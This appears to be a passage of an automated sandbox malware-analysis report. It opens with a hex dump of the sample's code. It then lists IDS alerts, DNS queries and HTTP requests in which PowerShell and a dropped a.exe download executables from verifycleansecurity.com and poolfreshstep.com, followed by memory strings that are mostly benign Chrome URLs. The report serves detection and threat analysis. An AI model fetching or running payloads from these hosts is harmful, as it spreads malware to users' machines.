00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a9 62 00 00 00 00 00 48 00 00 00 02 00 05 00 34 a8 1b 00 40 48 04 00 03 00 00 00 03 00 00 06 74 f0 1f 00 e2 b2 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 13 30 03 00 62 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 42 00 00 00 05 00 00 00 38 3d 00 00 00 28 06 00 00 06 28 09 00 00 06 72 01 00 00 70 28 0c 00 00 06 72 4d 00 00 70 28 0f 00 00 06 20 00 00 00 00 7e e5 08 00 04 7b b5 08 00 04 39 bc ff ff ff 26 20 00 00 00 00 38 b1 ff ff ff 2a 00 00 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 1b 30 05 00 82 04 00 00 02 00 00 11 20 08 00 00 00 fe 0e 0f 00 38 00 00 00 00 fe 0c 0f 00 45 09 00 00 00 32 00 00 00 69 00 00 00 57 00 00 00 7b 00 00 00 38 04 00 00 29 04 00 00 05 00 00 00 5c 00 00 00 10 00 00 00 38 2d 00 00 00 00 20 03 00 00 00 38 c7 ff ff ff 14 13 00 20 05 00 00 00 7e e5 08 00 04 7b ed 08 00 04 39 b0 ff ff ff 26 20 07 00 00 00 38 a5 ff ff ff 11 01 17 58 13 01 20 00 00 00 00 7e e5 08 00 04 7b a4 08 00 04 3a 8b ff ff ff 26 20 01 00 00 00 38 80 ff ff ff 14 2a 11 0b 2a 16 13 01 20 05 00 00 00 38
                      Source: global trafficHTTP traffic detected: GET /sfold/Kcjfkhnqcns.exe HTTP/1.1Host: poolfreshstep.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 111.90.145.132 111.90.145.132
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49714 -> 185.170.144.38:80
                      Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.170.144.38:80 -> 192.168.2.4:49714
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CMiSywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CMiSywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx0SWGOSGqFl0dtZghwwCPrDWZ3EBf4bTFepBKfbm0QixONaZ1g0k0wb5urkIhgEf-wtTWoyXC7BIhwS0UXcksj8ndmGfZlI935Rq3ulUdBkR3PC7PNxnieVeoyyGwH8AMZSmuXQkx7tZmkTZwCQrcez-zYFuv5rwQ/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_2_3_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
                      Source: global trafficHTTP traffic detected: GET /static/Qbffmsv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: verifycleansecurity.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                      Source: global trafficHTTP traffic detected: GET /sfold/Kcjfkhnqcns.exe HTTP/1.1Host: poolfreshstep.comConnection: Keep-Alive
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000003.1387383379.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1387428615.00003D3C01398000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                      Source: chrome.exe, 0000000C.00000003.1387383379.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1387428615.00003D3C01398000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlb equals www.youtube.com (Youtube)
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: verifycleansecurity.com
                      Source: global trafficDNS traffic detected: DNS query: fallback-01-static.com
                      Source: global trafficDNS traffic detected: DNS query: 59.60.14.0.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: poolfreshstep.com
                      Source: global trafficDNS traffic detected: DNS query: relay-01-static.com
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                      Source: chrome.exe, 0000000C.00000002.1521615709.00003D3C007C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
                      Source: powershell.exe, 00000001.00000002.1176038635.0000000007206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: chrome.exe, 0000000C.00000002.1524613309.00003D3C00BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
                      Source: chrome.exe, 0000000C.00000002.1527010971.00003D3C0109C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: chrome.exe, 0000000C.00000003.1472799994.0000021F40DDD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1514667978.0000021F40DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micr
                      Source: chrome.exe, 0000000C.00000002.1518059371.00003D3C0006B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poolfreshstep.com
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poolfreshstep.com/sfold/Kcjfkhnqcns.exe
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1170870168.0000000004721000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000358D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://verifycleansecurity.com
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://verifycleansecurity.com/static/Qbffmsv.exe
                      Source: a.exe, 0000000B.00000002.1787672422.0000000003583000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003598000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003546000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000356E000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000355A000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000358D000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003575000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000354C000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: chrome.exe, 0000000C.00000002.1519339651.00003D3C00304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                      Source: chrome.exe, 0000000F.00000000.1433368794.0000026406406000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1518017811.00003D3C0004C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1532602280.00003D3C01AE4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                      Source: chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
